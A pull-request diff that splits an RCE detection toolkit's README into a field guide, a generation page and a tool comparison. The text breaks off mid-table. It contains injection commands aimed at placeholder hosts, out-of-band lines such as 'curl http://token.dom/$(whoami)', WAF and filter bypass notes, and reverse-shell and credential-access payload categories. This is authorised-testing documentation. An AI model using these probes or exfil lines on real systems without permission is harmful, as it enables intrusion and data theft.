### PR TITLE
docs: add a tool comparison and split the reference out of the README

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # RCEKit — prove RCE, don't guess it
 
-**Version 2.20.0** · MIT · Python 3.8+ · zero third-party dependencies
+**Version 2.20.1** · MIT · Python 3.8+ · zero third-party dependencies
 
 RCEKit is an **RCE detection &amp; confirmation toolkit** for authorised penetration
 testing, red teaming, and security research. Point it at a target you are allowed
@@ -12,10 +12,13 @@ execution could produce* — random arithmetic, a template evaluation, a written
 token — checked against a payload-free control. Reflection, coincidence, and
 jitter can't fake it, so `confirmed` is something you can put in a report.
 
+---
+
+## Proof, not "maybe"
+
 RCEKit confirms RCE through **multiple methods** under one CLI. Below it is pointed
 at **real, publicly-documented CVEs** in production software — each verdict
-differenced against a payload-free control, so `confirmed` means the target
-*executed*, not that it might have:
+differenced against a payload-free control:
 
 | RCE class | `--methods` | Real-world target | Verdict |
 |---|---|---|---|
@@ -70,8 +73,7 @@ cd rcekit                    # Python 3.8+, standard library only — nothing to
 ```
 
 Put a `FUZZ` marker where your input lands (or select a parameter with `-p` when
-using a captured request — see [`-r`](#point-at-a-captured-request--r) below), and
-ask RCEKit to prove RCE:
+using a captured request), and ask RCEKit to prove RCE:
 
 ```bash
 python rcekit.py --acknowledge-consent \
@@ -90,6 +92,10 @@ python rcekit.py --acknowledge-consent \
 
 No external infrastructure, no config file. If nothing is vulnerable you get a
 clean `negative`, not a false alarm. That's the whole idea.
+
+**Next:** the [**field guide**](docs/guide.md) walks the real situations — captured
+requests, WAFs, filtered separators, quoted sinks, blind and no-egress targets —
+one worked example each.
 
 ---
 
@@ -115,6 +121,48 @@ blur together, "confirmed" loses its meaning — so RCEKit keeps them apart, by 
 
 ---
 
+## How RCEKit compares
+
+The tools below are good at what they do, and RCEKit does not replace them. The
+difference is **where each one stops**:
+
+| | What it's built for | RCE classes it covers | Infrastructure | Ends at |
+|---|---|---|---|---|
+| [**commix**](https://github.com/commixproject/commix) | exploiting OS command injection | OS command injection (classic, eval-based, time-based, file-based, shellshock) | none | an interactive shell |
+| [**SSTImap**](https://github.com/vladko312/SSTImap) *(successor to the unmaintained [tplmap](https://github.com/epinna/tplmap))* | exploiting SSTI / code injection | SSTI + code injection, 30+ template engines | none | an interactive shell |
+| [**Nuclei**](https://github.com/projectdiscovery/nuclei) | scanning at scale for *known* issues | whatever a template already exists for | [interactsh](https://github.com/projectdiscovery/interactsh) for OAST templates | a template match |
+| **interactsh / Burp Collaborator** | providing an out-of-band channel | blind variants of any class | an external (or self-hosted) server | a callback |
+| **RCEKit** | **proving execution across classes** | **command injection + SSTI/eval + blind + no-egress** | **none** | **a proof-backed verdict** |
+
+**Use the other tool when:**
+
+- **You want a shell.** commix and SSTImap take you from "vulnerable" to
+  post-exploitation. RCEKit deliberately stops at proof and will never hand you a
+  shell — that is a scope decision, not a missing feature.
+- **You are sweeping thousands of hosts for known CVEs.** That is Nuclei's job.
+  RCEKit is per-target — and it *exports* Nuclei templates
+  (`--output-format nuclei`), so the two compose rather than compete.
+- **You already run Burp Pro.** Then you already have Collaborator. RCEKit's
+  built-in listener matters when you don't, or when the engagement forbids
+  third-party OOB infrastructure.
+
+**Use RCEKit when:**
+
+- **You don't yet know the class.** One run of `--methods reflected,eval,time`
+  covers command injection, expression injection and blind timing against the same
+  injection point, instead of reaching for a different tool per hypothesis.
+- **The finding has to survive triage.** Every confirmation is differenced against
+  a payload-free control, and timing evidence is reported in its own
+  `needs-review` tier — never merged into "vulnerable". commix pioneered
+  randomised results-based heuristics for command injection; RCEKit carries that
+  rigour across expression injection, blind and no-egress paths, and refuses to
+  let a timing signal masquerade as proof.
+- **There is no egress and no infrastructure to lean on.** The `file` method
+  proves execution through a write-and-fetch on the target's own web root, with no
+  listener at all.
+
+---
+
 ## What it confirms
 
 One CLI, one `--methods` flag, covering the main paths to RCE:
@@ -128,22 +176,8 @@ One CLI, one `--methods` flag, covering the main paths to RCE:
 | **Blind / out-of-band** — Log4Shell/JNDI, exfil, async | *(OOB listener)* | Built-in HTTP/DNS listener receives callbacks and correlates each to the exact payload. |
 
 Mix them freely: `--methods reflected,eval,time` runs all three and reports each
-tier separately.
-
-The shell methods (`reflected`, `file`, `time`) apply to any environment whose
-runtime reaches a shell — the shell environments themselves plus the language
-runtimes, since PHP's `system()`, Python's `os.system()`, Node's
-`child_process.exec()`, Ruby's `system()`, Perl's backticks and Go's `os/exec`
-all hand the string to `/bin/sh`. So scoping a run to the language the
-application is written in (`--environments php`) still probes for command
-injection; a language runtime doesn't say which OS it runs on, so its probes
-take the Unix shape and `--environments windows` remains the way to get
-`cmd.exe` probes. The data-layer environments (`sql`, `graphql`, `mongodb`)
-are excluded: reaching a shell from those needs a different escalation, so
-`eval` is what applies there.
-
-If a combination builds no probes at all, RCEKit says so and exits non-zero —
-a run that tested nothing is never reported as a clean result.
+tier separately. If a combination builds no probes at all, RCEKit says so and
+exits non-zero — a run that tested nothing is never reported as a clean result.
 
 > **Honest scope.** RCEKit confirms RCE that is reachable by **injecting into a
 > request** and interpreted by a shell or an evaluator. It does **not** cover
@@ -154,356 +188,38 @@ a run that tested nothing is never reported as a clean result.
 
 ---
 
-## Usage
+## Find your situation
 
-Everything below needs `--acknowledge-consent` — RCEKit actively sends payloads,
-so only ever run it against systems you are authorised to test.
+Each row is a worked example in the [field guide](docs/guide.md) — the command,
+what it sends, and how to read what comes back.
 
-### Point at a URL
-
-Mark the injection point with `FUZZ` (in the URL, `--verify-data` body, or a
-`--verify-header`). Method defaults to GET, or POST when you pass `--verify-data`.
-
-```bash
-# GET query parameter
-python rcekit.py --acknowledge-consent \
-  --verify-url "https://target.example/lookup?host=FUZZ" --methods reflected
-
-# JSON body — "; id" is delivered inside the JSON string, not %3B%20id
-python rcekit.py --acknowledge-consent \
-  --verify-url "https://target.example/api" --verify-method POST \
-  --verify-header "Content-Type: application/json" \
-  --verify-data '{"host": "FUZZ"}' --methods reflected
-```
-
-RCEKit encodes the payload for the **exact injection point it lands in** — a query
-value is percent-encoded, a JSON field is JSON-escaped, a form field is
-form-encoded, a header stays single-line — so it reaches the sink intact instead
-of being blanket-encoded into a literal the sink never decodes.
-
-### Point at a captured request (`-r`)
-
-Skip rebuilding the request by hand. Save a request from Burp/your proxy and let
-RCEKit reuse its method, path, headers, body, and cookies:
-
-```bash
-python rcekit.py --acknowledge-consent -r request.txt -p host --methods reflected
-```
-
-Mark the point inline with `FUZZ` or `*`, or select a parameter with `-p NAME`
-(searched query → body → header → cookie). Each injection point is still encoded
-for its own context. Scheme is inferred (`https` on `:443`, else `http` — a
-portless capture cannot say which, and `http` keeps lab and internal targets
-reachable); the inferred scheme is printed, and a capture carrying an
-`Authorization` or `Cookie` header over plain `http` is flagged so you can
-pass `--request-scheme https` (add `--insecure` for a self-signed cert).
-`Host`/`Content-Length` are recomputed.
-
-### Blind and no-egress targets
-
-```bash
-# No output channel, but you control a writable web root → prove it with a file
-python rcekit.py --acknowledge-consent \
-  --verify-url "https://target.example/ping?ip=FUZZ" \
-  --methods file --webroot /var/www/html --web-base-url https://target.example
-
-# No output and no egress at all → hardened blind timing (a needs-review candidate),
-# corroborated by a results-based proof when any output channel exists
-python rcekit.py --acknowledge-consent \
-  --verify-url "https://target.example/ping?ip=FUZZ" \
-  --methods reflected,time --time-base 3
-```
-
-`file` changes target state (one file per confirmed probe), so it is gated behind
-`--webroot` + `--web-base-url` and prints an exact `rm`/`del` **cleanup command**
-for every finding.
-
-### WAF in the way?
-
-The default sends **clean, canonical** payloads — fewest variants, clearest
-confirmation, lowest false positives — assuming authorised, WAF-free access.
-`--evade low` opts into a single low-touch transform (`${IFS}` for spaces) for the
-shell probes. It is deliberately minimal, not noisy evasion.
-
-```bash
-python rcekit.py --acknowledge-consent \
-  --verify-url "https://target.example/ping?ip=FUZZ" --methods reflected --evade low
-```
-
-### Sink filters `;`?
-
-Stripping `;` is the most common partial mitigation there is, and it stops
-nothing on its own — the same sink stays exploitable through a pipe, a chain
-operator or a newline. So the shell probes sweep `; `, `| `, `|| `, `&& ` and a
-newline by default, and a filter that drops any one of them is still reached.
-Both chain operators are tried because the command your input lands in may
-succeed or fail, and only one of the two fires either way.
-
-Narrow the sweep once the sink's shape is known, to cut the request count:
-
-```bash
-python rcekit.py --acknowledge-consent \
-  --verify-url "https://target.example/ping?ip=FUZZ" --methods reflected \
-  --separators '| ,&& '
-```
-
-Injection point inside a quoted argument (`ping '<input>'`)? Use the matching
-context — `--contexts shell_single_quoted` or `shell_double_quoted` — whose
-break-out closes the quote and supplies its own separator.
-
-### Sink runs your input as the whole command?
-
-By default the shell probes break out of a surrounding command with a leading
-separator (`; …`), which fits the common `system("ping " + input)` sink. Some
-sinks instead execute the injected input *as the entire command* — a
-`qx/$input/` backdoor, a bare `sh -c "$input"` — where there is nothing to break
-out of and a leading `;` is a shell syntax error. Pass `--sink-raw` to send the
-probes as bare commands:
-
-```bash
-python rcekit.py --acknowledge-consent \
-  --verify-url "https://target.example/run?cmd=FUZZ" --methods reflected --sink-raw
-```
-
-### Reading the results
-
-- **`confirmed`** — execution proven. The evidence line shows the exact value the
-  target computed. Put it in the report.
-- **`needs-review`** — a candidate (e.g. a linear timing response). Worth manual
-  follow-up; not proof.
-- **`negative`** / **`inconclusive`** — reached the target but found no evidence, or
-  evidence that also appears without the payload (so it isn't attributable to execution).
-- **`error`** — the request never reached the target (a delivery/TLS failure). Kept
-  separate from `negative` on purpose: a connectivity problem must never read as
-  "not vulnerable". For a self-signed HTTPS cert, re-run with `--insecure`.
-
-<details>
-<summary><b>How a <code>confirmed</code> can't be a false positive</b></summary>
-
-Every confirmation is **differential** and built on a value RCEKit picked at
-random, so reflection or coincidence can't produce it:
-
-- **Results-based (`reflected` / `eval`)** — the expected value is a tag-wrapped
-  sum or a boundary-fenced product of random operands. A target that merely echoes
-  the payload returns the literal `$((a+b))` / `a*b`, never the computed value.
-  The value is also checked against a payload-free control, and the search is
-  encoding-aware (a base64/hex/url/html-encoded output still confirms).
-- **Timing (`time`)** — a controlled `0/N/2N` series must produce a *linear*
-  response-time increase; a one-off slow response (jitter) fails the regression.
-  Timing has no computed value, so it never self-confirms — it stays `needs-review`
-  and is corroborated by a results-based proof when a channel exists.
-- **File (`file`)** — the fetched file must contain the random token; a stale file
-  can't match because the filename and token are fresh each run.
-
-</details>
+| Situation | Go to |
+|---|---|
+| I have a URL and a parameter | [Point at a URL](docs/guide.md#point-at-a-url) |
+| I have a request saved from Burp | [Point at a captured request](docs/guide.md#point-at-a-captured-request) |
+| The app is JSON / the payload keeps getting mangled | [Landing the payload intact](docs/guide.md#landing-the-payload-intact) |
+| I don't know which class it is | [Choosing methods](docs/guide.md#choosing-methods) |
+| The sink strips `;` | [When the sink filters separators](docs/guide.md#when-the-sink-filters-separators) |
+| My input lands inside `'quotes'` | [Injecting inside quotes](docs/guide.md#injecting-inside-quotes) |
+| The sink runs my input as the whole command | [Whole-command sinks](docs/guide.md#whole-command-sinks) |
+| There's a WAF | [Working around a WAF](docs/guide.md#working-around-a-waf) |
+| No output comes back at all | [Blind targets](docs/guide.md#blind-targets) |
+| No output *and* no egress | [No-egress targets](docs/guide.md#no-egress-targets) |
+| The sink is behind a login or a file upload | [Multi-step chains](docs/guide.md#multi-step-chains) |
+| I got `needs-review` / `inconclusive` / `error` | [Reading the results](docs/guide.md#reading-the-results) |
+| It says the corpus is unusable | [Troubleshooting](docs/guide.md#troubleshooting) |
 
 ---
 
-## The arsenal — generation &amp; exports
+## Documentation
 
-Under the detection engine, RCEKit is still a strong payload **generator**: it
-builds context- and sink-aware payloads across 14 environments and exports them to
-the tools you already use.
-
-```bash
-# Benign probes (no consent needed) — does your input even reach a sink?
-python rcekit.py --detection-only --output detect.txt
-
-# Targeted payloads for an engagement
-python rcekit.py --acknowledge-consent \
-  --environments unix --categories basic_enum file_operations waf_bypass --output payloads.txt
-
-# Export to Burp / ffuf / Nuclei
-python rcekit.py --acknowledge-consent --categories code_execution \
-  --output-format nuclei --output run
-```
-
-- **`burp`** — deduplicated, watermark-free wordlists split per context, plus a
-  combined list. A `request.txt` with Burp's `§…§` marker is written when a target
-  profile supplies a real request.
-- **`ffuf`** — the same wordlists and, with a profile `request` block, a ready-to-run
-  `request.txt` + executable `run.sh`.
-- **`nuclei`** — runnable templates grouped by environment and oracle (OOB /
-  time-based / reflection). For the fullest pack: `--detection-only --output-format nuclei`.
-
-Every generated payload runs as-is on its sink or carries its own decoder —
-non-runnable transforms are removed and decoder-required blobs are opt-in, so you
-never copy a payload that silently does nothing.
-
----
-
-## Going further
-
-<details>
-<summary><b>Target profiles</b> — describe the target once, generate only what can fire</summary>
-
-A small JSON file supplies defaults (explicit CLI flags override them) and narrows
-generation to what could actually reach the sink:
-
-```json
-{
-  "name": "shell-concat-noquotes",
-  "environments": ["unix"],
-  "contexts": ["raw"],
-  "categories": ["basic_enum", "file_operations", "waf_bypass"],
-  "deny_chars": ["'", "\""],
-  "sink_needs_separator": true
-}
-```
-
-```bash
-python rcekit.py --acknowledge-consent --target-profile profiles/shell-concat-noquotes.json
-```
-
-- `deny_chars` / `max_length` filter the **final** payload (a URL-encoded quote
-  survives a quote filter because the literal character is gone).
-- **Sink shape** narrows generation: `sink_needs_separator` (mid-command injection
-  → separator-led break-outs only), `sink_blind` (no output → OOB/timing only),
-  `sink_decodes` (input is decoded → those encodings become valid). Against a
-  mid-command sink, `sink_needs_separator` dropped ~20% of payloads *without losing
-  a single confirmed hit*.
-- A `request` block (URL/method/headers/body with `FUZZ`) shapes the Burp/ffuf/Nuclei
-  exports to the real endpoint. Example profiles ship in [`profiles/`](profiles/).
-
-</details>
-
-<details>
-<summary><b>Multi-step / session-aware verification</b> — auth, file-upload, blind/async sinks</summary>
-
-A single request can't reach sinks behind a login, carried in **uploaded file
-content**, or executed **blind/async**. `--verify-chain <profile.json>` drives an
-ordered, cookie-aware chain (login → CSRF extraction → prerequisites → payload
-delivery → trigger) and confirms **in-band** (a `match` oracle on a chosen step) or
-**out-of-band** (a `{callback}` URL received by the built-in listener).
-
-Each step is `method` + `path` (+ optional `headers`) with one body of `body`
-(raw), `json`, `form`, or `multipart`. `FUZZ` marks the payload (including inside
-uploaded file content); `{var}` is substituted from an earlier step's `extract`,
-and `{token}` is a per-payload unique value.
-
-```json
-{
-  "base": "https://target.example",
-  "callback_host": "10.0.0.5", "listen_port": 8877, "confirm_step": "trigger",
-  "steps": [
-    {"name": "csrf",   "method": "GET",  "path": "/login", "extract": {"csrf": "csrf_token\" value=\"([^\"]+)"}},
-    {"name": "login",  "method": "POST", "path": "/login", "form": {"csrf": "{csrf}", "user": "u", "pass": "p"}},
-    {"name": "upload", "method": "POST", "path": "/import", "multipart": {"file": {"field": "f", "filename": "x_{token}.sql", "content": "FUZZ"}}},
-    {"name": "trigger","method": "POST", "path": "/import/run", "json": "{\"file\": \"x_{token}.sql\"}"}
-  ]
-}
-```
-
-```bash
-python rcekit.py --acknowledge-consent --environments postgres --categories code_execution \
-  --contexts raw --encodings none --verify-active-risk intrusive --verify-chain chain.json
-```
-
-</details>
-
-<details>
-<summary><b>Out-of-band listener</b> — confirm blind RCE without interactsh/Collaborator</summary>
-
-`--listen` receives OOB HTTP/DNS callbacks and correlates each to the payload that
-produced it, via the token in a `.map.jsonl` manifest:
-
-```bash
-python rcekit.py --acknowledge-consent --categories oob \
-  --oob-domain your-id.oob.example.com --output oob.txt
-python rcekit.py --listen --correlate oob.txt.map.jsonl \
-  --listen-http-port 8080 --listen-dns-port 53
-```
-
-```
-[HIT] http token=8k2hn1ufohpv from 10.0.0.5 -> ; curl http://8k2hn1ufohpv.oob.example.com/ [oob/raw]
-```
-
-Correlates by token in the callback host **or** path, so exfil like
-`curl http://token.dom/$(whoami)` still maps. Point the OOB domain's NS/A records
-here for real engagements (port 53 needs root); for lab use aim payloads straight
-at the listener.
-
-</details>
-
-<details>
-<summary><b>Reference</b> — environments, categories, contexts, encodings, sinks</summary>
-
-**Environments:** `unix`, `windows`, `nodejs`, `python`, `php`, `java`, `dotnet`,
-`ruby`, `perl`, `go`, `docker`, `kubernetes`, `graphql`, `mongodb`.
-
-**Categories:** `basic_enum`, `file_operations`, `network_operations`,
-`code_execution`, `download_execute`, `reverse_shells`, `credential_access`,
-`privilege_escalation`, `persistence`, `cloud_metadata`, `database_enumeration`,
-`lateral_movement`, `container_escape`, `waf_bypass`, `oob`, `nosql_injection`,
-`graphql_injection`.
-
-**Contexts** (each carries an escape rule so the payload survives its container):
-*Language / structural break-outs* (default): `raw`, `html`, `attribute`,
-`attribute_unquoted`, `javascript`, `sql`, `php`, `unix_shell`, `windows_cmd`,
-`powershell`, `shell_single_quoted`, `shell_double_quoted`, `graphql_string`.
-*Transport / serialization* (opt-in): `json`, `graphql_variable`, `xml`,
-`xml_cdata`, `yaml`, `http_header`.
-
-**Encodings:** default self-contained set — `none`, `url_encode`,
-`double_url_encode`, `random_case` (case-insensitive runners), `base64_decode_exec`
-(carries its own `base64 -d|sh`). Decoder-required blobs (`base64`, `hex`,
-`base64_then_url`, `double_base64`) are opt-in and only fire where the sink itself
-decodes the input.
-
-**Code-execution sinks** (for `--categories code_execution`): Node
-(`child_process_exec`, `*_ssti`, `vm_eval`, `deserialization`, `expression_template`),
-Python (`os_system`, `subprocess`, `jinja2_ssti`, `exec_ast`), Postgres
-(`psql_meta_command`), PHP (`exec_system`, `eval`, `deserialize`), Java
-(`runtime_exec`, `freemarker/velocity/thymeleaf_ssti`, `spel`, `ognl`, `groovy`,
-`deserialization`), .NET (`process_start`, `deserialize`), Ruby (`kernel_system`,
-`erb_ssti`), Perl (`system_backticks`), Go (`os_exec`), Mongo
-(`operator_injection`, `where_js`, `server_side_js`), GraphQL (`introspection`,
-`injection`, `batching`).
-
-</details>
-
-<details>
-<summary><b>Full option reference</b></summary>
-
-| Option | Description | Default |
-|--------|-------------|---------|
-| `--verify-url` | Authorised target URL with a `FUZZ` marker | None |
-| `-r`, `--request-file` | Raw HTTP request to inject into (mark with `FUZZ`/`*` or `-p`) | None |
-| `-p`, `--param` | Parameter/field/header/cookie to inject into for `-r` | None |
-| `--request-scheme {http,https}` | Scheme for the URL built from `-r` | auto |
-| `--methods <list>` | Detection methods: `reflected`, `eval`, `file`, `time` | None |
-| `--webroot` / `--web-base-url` | (file method) server write dir / URL that serves it | None |
-| `--time-base <seconds>` | (time method) base delay `N`; regression fires `0/N/2N` | `2.0` |
-| `--evade {none,low}` | WAF posture; `low` = minimal `${IFS}`-for-spaces on shell probes | `none` |
-| `--separators <list>` | (`--methods`) Comma-separated break-out separators for shell probes; `\n` = newline | `; `, `\| `, `\|\| `, `&& `, newline |
-| `--sink-raw` | (`--methods`) Sink runs input as the whole command; send probes with no leading separator | Off |
-| `--verify-data` / `--verify-header` / `--verify-method` | Body (with `FUZZ`) / repeatable header / HTTP method | — |
-| `--verify-url-location` / `--verify-body-location` | Encode the payload at the URL / body point | `query_value` / auto |
-| `--verify-delay` / `--verify-timeout` | Seconds between requests / per-request timeout | `0` / `8` |
-| `--insecure` | Skip TLS cert verification (self-signed internal targets), like `curl -k` | Off |
-| `--verify-active-risk` | Highest safety tier verification may fire (`safe`/`intrusive`/`stateful`) | `safe` |
-| `--verify-allow-destructive` | Allow destructive payloads (persistence/backdoors) | Off |
-| `--verify-chain <profile.json>` | Multi-step, session-aware verification | None |
-| `--listen` + `--correlate <map.jsonl>` | Run the OOB listener and map callbacks to payloads | Off |
-| `--listen-http-port` / `--listen-dns-port` / `--listen-answer-ip` / `--listen-log` | Listener settings | `8080` / `5335` / `127.0.0.1` / — |
-| `--oob-domain` | Collaborator/interactsh domain; each payload gets a unique subdomain | None |
-| `-o, --output` | Output file (or base directory for `burp`/`nuclei`) | `rce_payloads.txt` |
-| `--output-format` | `text`, `jsonl`, `burp`, `ffuf`, `nuclei` | `text` |
-| `--environments` / `--categories` / `--contexts` / `--encodings` | Restrict generation | All / default sets |
-| `--max-payloads` | Cap payloads (balanced round-robin sample) | Unlimited |
-| `--detection-only` | Benign canary/timing probes for safe validation | Off |
-| `--target-profile` | JSON profile of the target (supplies defaults) | None |
-| `--deny-chars` / `--max-length` | Drop payloads with these chars / longer than this | None |
-| `--sink-needs-separator` / `--sink-blind` / `--sink-decodes` | Narrow generation to the sink's shape | Off |
-| `--attacker-ip` / `--attacker-domain` | Substituted into reverse-shell / download payloads | `192.168.1.100` / `attacker.com` |
-| `--template-file` | Custom JSON payload templates | `templates/payloads.json` |
-| `--include-metadata` | Write a `.meta.jsonl` sidecar (indicators, tiers, notes) | Off |
-| `--max-safety` / `--include-blocking` | Highest safety tier / include blocking probes | `safe`–`intrusive` / Off |
-| `--watermark` | Embed a traceable token in each payload | Off |
-| `--acknowledge-consent` | Required to generate/fire exploitation payloads | Off |
-| `--doctor` | Check corpus integrity and exit non-zero if missing/empty | Off |
-
-</details>
+| | |
+|---|---|
+| [**Field guide**](docs/guide.md) | Example-driven walkthrough of every real situation, from a first probe to multi-step chains. **Start here.** |
+| [**Payload generation &amp; exports**](docs/generation.md) | RCEKit as a payload generator: target profiles, and Burp / ffuf / Nuclei exports. |
+| [**Reference**](docs/reference.md) | Every flag, environment, category, context, encoding and code-execution sink. |
+| [CONTRIBUTING.md](CONTRIBUTING.md) | How to add sinks, categories, encodings and detection methods. |
+| [SECURITY.md](SECURITY.md) | Reporting a vulnerability in RCEKit itself. |
 
 ---
 

--- a/docs/generation.md
+++ b/docs/generation.md
@@ -1,0 +1,128 @@
+# Payload generation &amp; exports
+
+Under the detection engine, RCEKit is also a strong payload **generator**. It
+builds context- and sink-aware payloads across 14 environments and exports them to
+the tools you already use, so the corpus that proves an RCE is the same corpus you
+fuzz with.
+
+For confirming RCE against a live target, see the [field guide](guide.md); for the
+full taxonomy of environments, categories, contexts and encodings, see
+[reference.md](reference.md).
+
+**Contents**
+
+- [Generating payloads](#generating-payloads)
+- [Target profiles](#target-profiles)
+- [Exports](#exports)
+- [Why generated payloads actually run](#why-generated-payloads-actually-run)
+
+---
+
+## Generating payloads
+
+```bash
+# Benign probes (no consent needed) — does your input even reach a sink?
+python rcekit.py --detection-only --output detect.txt
+
+# Targeted payloads for an engagement
+python rcekit.py --acknowledge-consent \
+  --environments unix --categories basic_enum file_operations waf_bypass \
+  --output payloads.txt
+
+# Machine-readable, with indicators and safety tiers alongside
+python rcekit.py --acknowledge-consent --environments php \
+  --output-format jsonl --include-metadata --output payloads.jsonl
+```
+
+Narrowing is what makes the output usable. Every one of `--environments`,
+`--categories`, `--contexts` and `--encodings` cuts the corpus; `--max-payloads`
+caps it with a balanced round-robin sample so you don't end up with 200 variants
+of the same idea.
+
+`--watermark` embeds a traceable token in each payload, which is worth turning on
+whenever generated payloads leave your machine — if one shows up in a client's
+logs later, you can prove which run produced it.
+
+---
+
+## Target profiles
+
+Describe the target once in a small JSON file and generate only what could
+actually reach the sink. The profile supplies defaults; explicit CLI flags always
+override it.
+
+```json
+{
+  "name": "shell-concat-noquotes",
+  "environments": ["unix"],
+  "contexts": ["raw"],
+  "categories": ["basic_enum", "file_operations", "waf_bypass"],
+  "deny_chars": ["'", "\""],
+  "sink_needs_separator": true
+}
+```
+
+```bash
+python rcekit.py --acknowledge-consent --target-profile profiles/shell-concat-noquotes.json
+```
+
+Example profiles ship in [`profiles/`](../profiles/).
+
+**Character and length filters** apply to the **final** payload, after encoding —
+so a URL-encoded quote survives a `deny_chars` quote filter, because the literal
+character is no longer there.
+
+**Sink shape** is the higher-leverage knob:
+
+| Key / flag | Meaning |
+|---|---|
+| `sink_needs_separator` / `--sink-needs-separator` | Input is concatenated mid-command → keep only separator-led break-outs |
+| `sink_blind` / `--sink-blind` | Sink returns no output → keep only OOB- and timing-confirmable payloads |
+| `sink_decodes` / `--sink-decodes` | Sink decodes input before use → those encodings become valid and are generated |
+
+Against a mid-command sink, `sink_needs_separator` dropped ~20% of payloads
+*without losing a single confirmed hit*.
+
+A profile may also carry a `request` block (URL, method, headers, body with
+`FUZZ`), which shapes the Burp/ffuf/Nuclei exports to the real endpoint instead of
+a generic placeholder.
+
+---
+
+## Exports
+
+```bash
+python rcekit.py --acknowledge-consent --categories code_execution \
+  --output-format nuclei --output run
+```
+
+| `--output-format` | What you get |
+|---|---|
+| `text` | One payload per line. The default. |
+| `jsonl` | One JSON object per payload; pair with `--include-metadata` for indicators, safety tiers and notes. |
+| `burp` | Deduplicated, watermark-free wordlists split per context, plus a combined list. A `request.txt` with Burp's `§…§` marker is written when a profile supplies a real request. |
+| `ffuf` | The same wordlists and — with a profile `request` block — a ready-to-run `request.txt` plus an executable `run.sh`. |
+| `nuclei` | Runnable templates grouped by environment and oracle (OOB / time-based / reflection). |
+
+For the fullest Nuclei pack, generate from the benign corpus:
+
+```bash
+python rcekit.py --detection-only --output-format nuclei --output run
+```
+
+For `burp` and `nuclei`, `--output` is a **base directory** rather than a single
+file.
+
+---
+
+## Why generated payloads actually run
+
+Every generated payload either runs as-is on its sink or carries its own decoder.
+Transforms that would produce a non-runnable string are removed, and
+decoder-required blobs (`base64`, `hex`, `base64_then_url`, `double_base64`) are
+opt-in — they are only generated when you tell RCEKit the sink decodes its input,
+via `--sink-decodes` or a profile's `sink_decodes`.
+
+The practical consequence: you never copy a payload out of the output that
+silently does nothing. A payload that appears in the list is one that fires on the
+sink it was generated for.

--- a/docs/guide.md
+++ b/docs/guide.md
@@ -1,0 +1,480 @@
+# RCEKit field guide
+
+Every section below is a situation you actually hit on an engagement, with the
+command that handles it and how to read what comes back. If you are looking for
+the exhaustive list of flags instead, that lives in [reference.md](reference.md).
+
+Everything here needs `--acknowledge-consent` — RCEKit actively sends payloads, so
+only ever run it against systems you are authorised to test.
+
+**Contents**
+
+- [The five-minute workflow](#the-five-minute-workflow)
+- [Point at a URL](#point-at-a-url)
+- [Point at a captured request](#point-at-a-captured-request)
+- [Landing the payload intact](#landing-the-payload-intact)
+- [Choosing methods](#choosing-methods)
+- [When the sink filters separators](#when-the-sink-filters-separators)
+- [Injecting inside quotes](#injecting-inside-quotes)
+- [Whole-command sinks](#whole-command-sinks)
+- [Working around a WAF](#working-around-a-waf)
+- [Blind targets](#blind-targets)
+- [No-egress targets](#no-egress-targets)
+- [Out-of-band callbacks](#out-of-band-callbacks)
+- [Multi-step chains](#multi-step-chains)
+- [Reading the results](#reading-the-results)
+- [Keeping the run quiet](#keeping-the-run-quiet)
+- [Troubleshooting](#troubleshooting)
+
+---
+
+## The five-minute workflow
+
+Most engagements follow the same four steps. The rest of this guide is what to do
+when one of them doesn't go to plan.
+
+**1. Check the input even reaches a sink** — benign, no consent needed:
+
+```bash
+python rcekit.py --detection-only --output detect.txt
+```
+
+**2. Fire the two results-based methods.** They are cheap, safe, and between them
+cover command injection and expression injection:
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/lookup?host=FUZZ" \
+  --methods reflected,eval
+```
+
+**3. If that comes back `negative`, add timing** — the sink may execute with no
+output channel:
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/lookup?host=FUZZ" \
+  --methods reflected,eval,time --time-base 3
+```
+
+**4. Read the tier, not just the word.** `confirmed` goes in the report as proven
+execution. `needs-review` goes in your notes for manual follow-up. See
+[Reading the results](#reading-the-results).
+
+---
+
+## Point at a URL
+
+Mark the injection point with `FUZZ` — in the URL, the `--verify-data` body, or a
+`--verify-header`. The method defaults to `GET`, or `POST` when you pass
+`--verify-data`.
+
+```bash
+# GET query parameter
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/lookup?host=FUZZ" --methods reflected
+```
+
+```bash
+# Header injection — the payload stays single-line so the request stays valid
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/" \
+  --verify-header "X-Forwarded-For: FUZZ" --methods reflected
+```
+
+Self-signed certificate on an internal box? Add `--insecure` (the same idea as
+`curl -k`). Without it, a TLS failure is reported as `error`, not `negative` —
+RCEKit will not let a connectivity problem read as "not vulnerable".
+
+---
+
+## Point at a captured request
+
+Rebuilding a real request by hand is where mistakes creep in: a missing cookie, a
+dropped CSRF token, the wrong `Content-Type`. Save the request from Burp or your
+proxy and let RCEKit reuse its method, path, headers, body and cookies:
+
+```bash
+python rcekit.py --acknowledge-consent -r request.txt -p host --methods reflected
+```
+
+Two ways to mark the injection point:
+
+- **Inline** — put `FUZZ` or `*` in the saved request where the payload goes.
+- **By name** — `-p host` selects a parameter, searched in the order
+  query → body → header → cookie. One injection point per run in this release.
+
+**The scheme trap.** A portless capture cannot record whether it was HTTPS, so
+RCEKit infers `https` when the `Host` is on `:443` and `http` otherwise — which
+keeps lab and internal targets reachable. The inferred scheme is always printed,
+and a capture carrying an `Authorization` or `Cookie` header over plain `http` is
+flagged, because that would put credentials on the wire in cleartext. When the
+flag fires, re-run with the scheme pinned:
+
+```bash
+python rcekit.py --acknowledge-consent -r request.txt -p host \
+  --request-scheme https --methods reflected
+```
+
+`Host` and `Content-Length` are recomputed for you.
+
+---
+
+## Landing the payload intact
+
+This is the single most common reason a real vulnerability comes back `negative`:
+the payload arrives at the sink already mangled, so nothing executes.
+
+RCEKit encodes each payload for **the exact injection point it lands in** — a
+query value is percent-encoded, a JSON field is JSON-escaped, a form field is
+form-encoded, a header stays single-line. So `; id` is delivered as a working
+separator inside a JSON string, not as the literal `%3B%20id` that the sink never
+decodes:
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/api" --verify-method POST \
+  --verify-header "Content-Type: application/json" \
+  --verify-data '{"host": "FUZZ"}' --methods reflected
+```
+
+The body location is auto-detected from the `Content-Type` and the shape of the
+body. Override it when the guess is wrong:
+
+| Flag | Use when |
